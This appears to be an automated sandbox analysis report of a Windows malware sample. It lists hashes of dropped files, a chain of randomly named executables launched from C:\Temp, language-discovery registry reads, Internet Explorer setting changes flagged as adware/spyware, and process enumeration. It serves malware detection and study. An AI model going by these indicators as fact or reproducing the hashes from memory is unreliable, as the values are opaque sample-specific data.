SHA256 6dd1bbf5c62d5c730e5ebbd3b722db8df13654ed6f3756ecc2902c697dab42de
SHA512 f6eb01ad77b21d4e8ec42b912d56c443869b3eb2412643f1f667dc54334d1751bf3b2cb7055fa768edba2afb22c20fdffd5cea930f5d02b83b4bd91dfac46f59

C:\Temp\i_caupmhfzur.exe

MD5 9dbf217c86132ff02816fd741df60665
SHA1 8349cbb7236ea1257655a5ae095006efc654b1d9
SHA256 658463c383184cbd844ec1d30a56762baca74770570c0888cc0682c08cdd9bb5
SHA512 cfb555ffb08bad28262e87760ac80197d7b46a6548a764b25a7826f4b4d6e48ae44c65f16fa2ac3a0b1ea815bb0d4421eea4f3f0ee9dc7389e0d5aa888cb1bba

C:\Temp\rmgeywrljd.exe

MD5 d654145a1e98197d32417950e4511398
SHA1 7ff39f2509ead996bce9849112b22a6c37942d0f
SHA256 76cb0f6aa2c6c75f143caff093f40a36f562a092e4ef7cf37569faf4490d852d
SHA512 ef4e3839cc066392151fb63effa7eaf4f8dc6383c2101d1a8bd4de9d31886a740bb7ba5440b6d3594e243b8e2fcf87f66574f38aebc05a2269eedd383618839b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5e69d8333b7ced3c23d30b182489153a
SHA1 e18e4ff8a92282baa41ce46fd5ea4095327bf529
SHA256 0f7136ab0885db215e3d63b672fbe6669d2ed99eb0cbac8dfdbd8680183e77b0
SHA512 e5546cbde24d94c4de383d8078c6a58d9107897a721ad46a96a619d419a004bc26c24e8ea43d02db78678a75509abd9438ecc0661a9f0ce2d28be769dec4bee1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7501b09641eacc4f206dac1c50a9df6d
SHA1 877800b8707da3dd76a0581bfd852ed6eb1604f0
SHA256 6b4bcb7905f71faca7e16b341d13e40f6216cc0bae2ab8e2b8046f7bd6122225
SHA512 748e5d1fa2050a90e4029593778b40e4b630dfca846e54cf0e62d30608142ab86e176d57f3de123cdded01e42323acacd7a1ec70676f529b1264e966d08daf49

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ed9268aca781c8c4057bce611b9aa161
SHA1 dea97aaf2ce623b6c6a9958d2f453a1b5f9ce86f
SHA256 62919e92d04f8beb800fc5160a4bdccde4596bde9a64f56a00ab8c9ec8e7897e
SHA512 1c71a31df440dfb0939c946bdf46ffb798e7559f3bb41350bd7413a79846a7d28744828e68d0838773a4d0b8fd63593d5c0af10e5e65adb5ecd40fc6381bd531

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aac2e25a2466a52d6a21cedbb517976c
SHA1 48e8a8a77b4a0266f6c8bb837c73ecde1350b5c7
SHA256 06074d1596109f93635c586849e36639375c49633efdde86edd26d9386d0d5c4
SHA512 e0e1158e40fddc5b38b575970bf10489b4556808acfe6112ee7e535f822e388b8297d165982036816407cb04b2513eb813a2954c1e64ae2e5e7bc08cc1b53e12

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 46688278e42093e8eec98919493acefb
SHA1 fe2adeeaf28c16ba51f50f2f981101d4721d664c
SHA256 59829f252d1702e58b395d078810451f9e73a91cb8c84e1139e586aff2252b4d
SHA512 baf62b87bce6ed45de361b292a81b8955b267e295f3bf3ce6481507ac7a95bdfcda51f2d0da66e37bfd90f45ffc3c930310ddf20c7a45909ea0534b3027fcff0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 60d120539084a73d6ef45fce6b83ff5b
SHA1 b692abd5c2d2e05b2795dcfd6aad2584ece1b25a
SHA256 2a2a0db90f5d2622f4d4d669121e6b43bd5f812c693ce8eaf0aa101f06644826
SHA512 83641ad37c493654b069d084643e19de108b71e9ac517dd3e09f8fa514b5539a4f9b363bcba1dbab4ae9db297cb28ede211afb819a919826b13e25bc8f7d6501

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2aa554e4c61e5bc9156b44778debdd03
SHA1 aabefb2b395bcf08dc3a32cfa5e0b4a47b4c7eda
SHA256 b7f1fd9b9f1f4ef85fd8798a5352b40f131c4c8164827d3e77a8ddc44abd0425
SHA512 07e2157d5624a04bc2c44e227fbec2e94901fd9da2f91784f0a40db60d4dd463e6250b810d4848afc9c67e5732367cd33fcad16c195b3af761ee283571a6dbc3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90e6f76c2b0e9c0dd58e332d6eb4819d
SHA1 067573a3fb06aa07218d501800594a94b056a181
SHA256 6fce3ba7a7b030d7d18dfaedea0d4166450ac0ad0579be302e54315dd21b262d
SHA512 b4e886ac03498969827150e60e4b389f6f08b7791eeb770b1e01ead11a8804064159b9f7d95b1e709590b54d6a14c123818ec8978d71a34e61abede498b637cf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 45979d788cc3a7b8aae0782a93e8f904
SHA1 c99eb5584556a310fea41c11a6931cb15d28f265
SHA256 4df0ef2740762fedeadaaaf3e2d23d3e06f3f7a04a5df45258e39083f8bfdc32
SHA512 ae43d110d09bfff2df2be69997a6ee78097f1214cfc293c66924212d8189b5506f510199d6bd2cdffd3c7302522d2578f96b32569e35f05f3b61c1923b4eb538

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6056e30a6a10ce91bcf0933fa53f69f4
SHA1 eaf0ff65fdee0ffdb9c30e3b60a9dcff8798f319
SHA256 2af12381c2ba3e57cb4dcfe8127cde82691a84ba3fa2aedbe664d08fb750e93b
SHA512 3384a733015166b351498e29285c0ccc9f103beb80826de8829623904269ea39fa4d80947cfc2e4104a329a394a3585e4165b23c9dd80ec302b71ad49e2ed07f

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-27 20:34

Reported

2025-01-28 02:49

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kicavpnhfa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_kicavpnhfa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kfzxrpkhcz.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_kfzxrpkhcz.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\zusmkecwup.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_zusmkecwup.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\zxrpjhczur.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_zxrpjhczur.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\trljebwuom.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_trljebwuom.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\ojgbztrljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_ojgbztrljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\oigtqljdbv.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_oigtqljdbv.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\fdyvqnigay.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_fdyvqnigay.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\axsqkicaus.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_axsqkicaus.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\usmkfcxvpn.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_usmkfcxvpn.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\zxspkicamk.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_zxspkicamk.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\xrpjhczusm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_xrpjhczusm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\uomgezwroj.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\zxrpjhczur.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\oigtqljdbv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_rljdbwtomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\upnhfzxspk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\zusmkecwup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\trljebwuom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\zxspkicamk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_uomgezwroj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kicavpnhfa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qnigaysqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_zxrpjhczur.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_oigtqljdbv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\uomgezwroj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\wqoigbytql.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ojgbztrljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\fdyvqnigay.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\axsqkicaus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_zxspkicamk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\dxvpnifaysqkicav.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\temp\CreateProcess.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kicavpnhfa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_trljebwuom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\xrpjhczusm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\rljdbwtomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qkicausnkf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_smkecwupmh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kfzxrpkhcz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_xrpjhczusm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_wqoigbytql.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\smkecwupmh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_upnhfzxspk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_tnlfdyvqoi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qnigaysqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qkicausnkf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_axsqkicaus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\usmkfcxvpn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_usmkfcxvpn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\tnlfdyvqoi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kfzxrpkhcz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_zusmkecwup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_ojgbztrljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_fdyvqnigay.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444797372" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab0000000000200000000001066000000010000200000006825e099f7be78400aeca8c813c9be085e9a858333164a16505b30518e556973000000000e80000000020000200000008af9c9b2ee7dbe097e3feb69f214a97a2440b8ae6a3d7ad089e3c84b96e08e6320000000ffd3f30b8f1dd09d1cd12230fc8c4636627b3a1e8a3e7a8107ec2c177697afa240000000c6a849490abc84dc992fc7b5f05aeff8514d8652a893df228a2dd93ff351db7ae6f3d8a2ab451848c90e4ec43076553598a007e1dbc5bfe63144a6f40f072fc3 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3971427848" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00ed3eed2e71db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab000000000020000000000106600000001000020000000fd4fb3445c6722a2d381e57488e7ab7dddc0478f1ff590dd3e7b754775f67843000000000e80000000020000200000009b3141c7de4da346fa576f75cc308c1b61e8335ea95400ac8d8f14f475115c2420000000702a04fd2665ee90b691713bcbc54dd45e2a75bdb91f65e01f13168992d17daf40000000a8ca3a4edd20bd2e5fa85def9edaffdebcfe3be6d08620b95e6e1f4c21d40c5d6c575366cc3af75a953a2eacdfc3a1db15981c4d04eb5b3d62d686f141a031aa C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0444ded2e71db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{180D4172-DD22-11EF-AF2A-DA67B56E6C1B} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3973147440" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
